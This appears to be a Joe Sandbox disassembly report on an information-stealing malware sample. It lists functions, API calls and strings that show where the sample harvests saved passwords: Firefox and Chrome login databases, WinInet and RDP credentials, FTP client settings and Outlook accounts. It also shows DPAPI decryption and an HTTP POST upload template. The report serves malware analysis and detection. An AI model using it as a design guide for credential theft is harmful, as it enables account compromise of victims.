                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                                • String ID: ftp://$http://$https://
                                                • API String ID: 3968356742-2804853444
                                                • Opcode ID: 7e87e55dfc79e0dbbb9f6a7a67bd92cb10d6033c9208a6a6a4bc9857dad12c73
                                                • Instruction ID: e50de70f366a9a73352d6ba0206718c11b41da89e4af0f10d66e37424ec97bcb
                                                • Opcode Fuzzy Hash: 7e87e55dfc79e0dbbb9f6a7a67bd92cb10d6033c9208a6a6a4bc9857dad12c73
                                                • Instruction Fuzzy Hash: 8A51EB31910109FADF11AB91DC41EEEBB7AFF48318F14403AF611B11A1D7799A90DF98
                                                Function 00408961 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004089D1
                                                • lstrcmpiA.KERNEL32(00414F84,?), ref: 004089FA
                                                • lstrcmpiA.KERNEL32(00414F86,?), ref: 00408A17
                                                • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 00408ABE
                                                • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 00408AD1
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$\*.*
                                                • API String ID: 3040542784-1692270452
                                                • Opcode ID: 1373f4a783db63f418b5cdd332dd9fd788e84fa68d516b1518b74b8214f3bd15
                                                • Instruction ID: 5ea2f1443042eb35dbb5eee109b5069dc3daeb25fe79f4f70908f7877fe18fba
                                                • Opcode Fuzzy Hash: 1373f4a783db63f418b5cdd332dd9fd788e84fa68d516b1518b74b8214f3bd15
                                                • Instruction Fuzzy Hash: 6A317E70A00209AEDF10BF61CD42FEE7769AF40304F1041BBF458B51E2DB789AD1AE59
                                                Function 0040A96D Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 88stringencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A9DF
                                                • lstrlenW.KERNEL32(00416369,?,?,00000000), ref: 0040AA1D
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AA4D
                                                • LocalFree.KERNEL32(00000000), ref: 0040AA7F
                                                • CredFree.ADVAPI32(00000000), ref: 0040AA9D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                                • String ID: Microsoft_WinInet_*$icA
                                                • API String ID: 3891647360-3506372221
                                                • Opcode ID: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
                                                • Instruction ID: ec4eec63bcc124374d5f2d7e6b4d46d77861198517d8893598619f99e1c26cfb
                                                • Opcode Fuzzy Hash: e2cdd9777c561ac2bb41ebb2efe91c84cbc4f3f4b8840245c1f494ee64d6074b
                                                • Instruction Fuzzy Hash: 9C312D71A00209EADF21CF84DD05BEEB7B4EB44315F15443AE951B61D0D3BC9A94CBAA
                                                Function 0040CE3D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116stringencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlen.KERNEL32(00000000), ref: 0040CEE2
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CF48
                                                • LocalFree.KERNEL32(00000000), ref: 0040CF6F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                • String ID: full address:s:$password 51:b:$username:s:
                                                • API String ID: 2920030623-2945746679
                                                • Opcode ID: 4de0fc10d86f9dbb328cc1389e0e3ad543be1a4fc7a580c7df22081d6eab4492
                                                • Instruction ID: 54cf008bb3eae58b1a30e6a5af3c8a5bf0615ee99b7eb6d7c5b05f7a3dd5831b
                                                • Opcode Fuzzy Hash: 4de0fc10d86f9dbb328cc1389e0e3ad543be1a4fc7a580c7df22081d6eab4492
                                                • Instruction Fuzzy Hash: FE414F3190010AEADF11ABE5C886BEEBF76EF44714F10423BE601711E1D7794A92DB5A
                                                Function 0040AB24 Relevance: 4.6, APIs: 3, Instructions: 121stringencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlen.KERNEL32(?), ref: 0040AB39
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                                                • LocalFree.KERNEL32(00000000), ref: 0040AC24
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                • String ID:
                                                • API String ID: 2920030623-0
                                                • Opcode ID: a7c68285a53ed8785de9083eb9a7c43ff877bce043cd3673119ee316846b30eb
                                                • Instruction ID: 9475b3dff48bb3a680590f8f4b8fbf70d62397470b3612e928ce05771e3a80a2
                                                • Opcode Fuzzy Hash: a7c68285a53ed8785de9083eb9a7c43ff877bce043cd3673119ee316846b30eb
                                                • Instruction Fuzzy Hash: C731C7776042099FEF209E58D844BCDB776EB85374F504133DB51A72C4D2BCAA92CA4E
                                                Function 004044D2 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404531
                                                • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040454D
                                                • FreeSid.ADVAPI32(?), ref: 00404561
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
                                                • Instruction ID: e42ff38ce7fd43cd37d3952dc6f34b3e9485a0eb1960dbb1a6bbd8e72996f532
                                                • Opcode Fuzzy Hash: 215ca8e38a4b271ad3cee58523825795728ac6a35de670ecaf2f6a1a604882c9
                                                • Instruction Fuzzy Hash: AA114470504249EEEB11CB94DC1DB9EBBF4AB50309F05C0B5D154AB2E1D3B9E908C7AA
                                                Function 004043DC Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                                                • LocalFree.KERNEL32(00000000), ref: 0040445C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotect
                                                • String ID:
                                                • API String ID: 1561624719-0
                                                • Opcode ID: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
                                                • Instruction ID: d6296d7f62e99f81d38af1605d697d2135ce95648fdc9c4461f15ac0c6790018
                                                • Opcode Fuzzy Hash: 6e74fe00b55e7932f4a8f56ddd37455bc0ab8baf8583fb2bef727fa63ab50fae
                                                • Instruction Fuzzy Hash: 0C112875A00218EBDF118E94DC44BDEBB74FB84361F448466FA21662D0C378AA40CB49
                                                Function 004094D8 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                                • API String ID: 0-1526611526
                                                • Opcode ID: 1d281aee4272f9250f400c3888ae49f761eed4e7aebebf42cb24ce9bc7f8b5b7
                                                • Instruction ID: 8ada1e9ecac2b6a16ee08af0ca764310d7711adbc3e5f5be3c6fd46ad6a69e20
                                                • Opcode Fuzzy Hash: 1d281aee4272f9250f400c3888ae49f761eed4e7aebebf42cb24ce9bc7f8b5b7
                                                • Instruction Fuzzy Hash: 6F912571910209EADF11AFA1CC46BEEBEB5AF44308F20443BF011722E2DBB94D91DB59
                                                Function 0040926B Relevance: 22.7, APIs: 8, Strings: 7, Instructions: 165COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                                                • API String ID: 0-3560805513
                                                • Opcode ID: 827d12ebccb40a3908b23ec9125f8cb4cad4b81e66f4b2e1889284962ec50f8b
                                                • Instruction ID: 0b43bc70ff64a1734e0ce49f563043eae91eb0b2240d540db883058d32c88b0f
                                                • Opcode Fuzzy Hash: 827d12ebccb40a3908b23ec9125f8cb4cad4b81e66f4b2e1889284962ec50f8b
                                                • Instruction Fuzzy Hash: 02512870900109BADF11AFA1CD06AEE7F75AB54349F10443BB512B01E3D7B98EA1EA5D
                                                Function 0040AC3E Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • wsprintfA.USER32 ref: 0040ACAA
                                                • wsprintfA.USER32 ref: 0040ACBD
                                                • wsprintfA.USER32 ref: 0040ACD0
                                                • wsprintfA.USER32 ref: 0040ACE3
                                                • wsprintfA.USER32 ref: 0040ACF6
                                                • wsprintfA.USER32 ref: 0040AD09
                                                • wsprintfA.USER32 ref: 0040AD1C
                                                  • Part of subcall function 0040AB24: lstrlen.KERNEL32(?), ref: 0040AB39
                                                  • Part of subcall function 0040AB24: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                                                  • Part of subcall function 0040AB24: LocalFree.KERNEL32(00000000), ref: 0040AC24
                                                  • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                                                • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                                • API String ID: 3846021373-1012938452
                                                • Opcode ID: e4f09ba1ab378aa8aa4d5a9de2269ea1075cbbd443485da2b849f4e7a922d2f4
                                                • Instruction ID: 1bba98e3d6ebe3bfaf8854b06724a853d0d9b8747224fc931b02987156b93079
                                                • Opcode Fuzzy Hash: e4f09ba1ab378aa8aa4d5a9de2269ea1075cbbd443485da2b849f4e7a922d2f4
                                                • Instruction Fuzzy Hash: 6861B532940208BAEF127FA1DC42EEDBA72AF04344F14853AF914741F1D77A5AA4EB59
                                                Function 0040F545 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                                                  • Part of subcall function 0040A2A9: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB
                                                  • Part of subcall function 0040A2F4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A330
                                                  • Part of subcall function 0040A2F4: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A339
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F58E
                                                • lstrcmpiA.KERNEL32(?,identification), ref: 0040F60E
                                                • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F623
                                                • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F646
                                                • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F665
                                                • lstrcmpiA.KERNEL32(?,identities), ref: 0040F684
                                                • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F6E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                • API String ID: 636431001-4287852900
                                                • Opcode ID: 1ce6b7ace68d01d369585ed74b018ba19da90517791f3557c33866cb3dfc0c10
                                                • Instruction ID: 5defee22b8e27fb871682b6a3356ac2aeb954d56b4ddb1cb6db0f340d7122943
                                                • Opcode Fuzzy Hash: 1ce6b7ace68d01d369585ed74b018ba19da90517791f3557c33866cb3dfc0c10
                                                • Instruction Fuzzy Hash: FF416F7180021DABEF219F50CD41FDA7779BF05304F0045B6B604751E2DBB99AE99F98
                                                Function 00402E2F Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402D7B
                                                • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402D9F
                                                • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402DC9
                                                • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402DE1
                                                • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402DEE
                                                • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E0F
                                                • CloseHandle.KERNEL32(?), ref: 00402E34
                                                • CloseHandle.KERNEL32(?,?), ref: 00402E3C
                                                • CloseHandle.KERNEL32(?), ref: 00402E46
                                                • Process32Next.KERNEL32(?,00000128), ref: 00402E58
                                                • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402E68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                                • String ID: explorer.exe
                                                • API String ID: 3144406365-3187896405
                                                • Opcode ID: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
                                                • Instruction ID: 32ad39438d36eb2c4f1d55e69c665a30fc6644003667a0189b3d930331164acb
                                                • Opcode Fuzzy Hash: 49e4cd7d7ed3542de117e9f293d799c5d97a6a6d7919811d6a423e5cfa3976f1
                                                • Instruction Fuzzy Hash: 8F210031940118AADF219B61DD49BEEB7B4AB08344F1044F6E209B11E0DBB89FC5DF99
                                                Function 0040BA3C Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004028FE: lstrlen.KERNEL32(?), ref: 00402932
                                                • StrStrIA.SHLWAPI(?,004164C1), ref: 0040BA50
                                                • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040BA72
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcmpilstrlen
                                                • String ID: CONSTRAINT$origin_url$password_value$username_value
                                                • API String ID: 3649823140-2401479949
                                                • Opcode ID: 500035ece04242e1ae96020af6f937db67946e234e9f7a9da2f3ebc026f93c9e
                                                • Instruction ID: a2f71f728c42a4325fa4d28dd5602d5680443d2fae4c4e77b8657f15ca9af250
                                                • Opcode Fuzzy Hash: 500035ece04242e1ae96020af6f937db67946e234e9f7a9da2f3ebc026f93c9e
                                                • Instruction Fuzzy Hash: 9C111276310109B9CF116F25EC029DE7F91EB51398B008136F819A51E2D7F9DAE1AB9C
                                                Function 00403DE5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133networkstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403E58
                                                • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403E83
                                                • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403EC9
                                                • wsprintfA.USER32 ref: 00403EEE
                                                  • Part of subcall function 00403DB7: 6F0613D0.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403DDC
                                                • lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403F19
                                                • closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403F64
                                                Strings
                                                • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403EE6
                                                • <, xrefs: 00403EA3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$Crack$AllocCreateF0613Localclosesocketlstrlenwsprintf
                                                • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                                • API String ID: 1313980377-2005047030
                                                • Opcode ID: e8af38e846cf4d39388a8fcc6fea0907a77859fdb6d06ed6b1355339a6069a22
                                                • Instruction ID: a429c4077cf35c25440d6dd763033275fbd814fdd036323c4685f88714ea5c3a
                                                • Opcode Fuzzy Hash: e8af38e846cf4d39388a8fcc6fea0907a77859fdb6d06ed6b1355339a6069a22
                                                • Instruction Fuzzy Hash: 4C41F771D00209EAEF11AFE5CC41BEEBEB9EF08346F10803AF510B52A1D7B95A55DB19
                                                Function 00409AC1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: IsRelative$Path$Profile$profiles.ini
                                                • API String ID: 0-4107377610
                                                • Opcode ID: 2f39451c8eed89c1c4daeb202a394c86bc72f458fd4edabb682e8c06e2bd1776
                                                • Instruction ID: 5ee8cadbbd8b00acdf57b7c0c8cba141a4701fb156d17687039a110dfaec4fae
                                                • Opcode Fuzzy Hash: 2f39451c8eed89c1c4daeb202a394c86bc72f458fd4edabb682e8c06e2bd1776
                                                • Instruction Fuzzy Hash: 97412C31A40146BADF227BA1DC02EAE7F72AF51314F14457BB510741E2DBBE9E90AB09
                                                Function 00403A78 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403B00
                                                • lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403B11
                                                • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403B32
                                                • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403B49
                                                • lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403B5A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$AllocLocal
                                                • String ID: Content-Length:$Location:
                                                • API String ID: 2140729754-2400408565
                                                • Opcode ID: ab74e394f7b4ed77bf4176948ba239d95289de72329f0c94484bdd459f283391
                                                • Instruction ID: 887c3a052e585dbf08982f6133b0250286a7e5dbb1d34c025ab1b04810de1b55
                                                • Opcode Fuzzy Hash: ab74e394f7b4ed77bf4176948ba239d95289de72329f0c94484bdd459f283391
                                                • Instruction Fuzzy Hash: 9541D731A04249BBDB10AFA5CC45F9DFF79EF80309F208177B510B52D1C7799A51DA54
                                                Function 0040446A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404478
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404490
                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004044A1
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004044B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmpDownload File
